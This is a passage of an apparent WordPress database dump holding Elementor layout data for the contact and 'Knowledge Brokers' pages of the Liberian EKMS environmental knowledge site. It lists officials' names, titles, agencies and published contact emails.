href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23443,3409,'_elementor_edit_mode','builder'),(23444,3409,'_elementor_template_type','wp-page'),(23445,3409,'_elementor_version','3.0.16'),(23446,3409,'_wp_page_template','default'),(23447,3409,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br 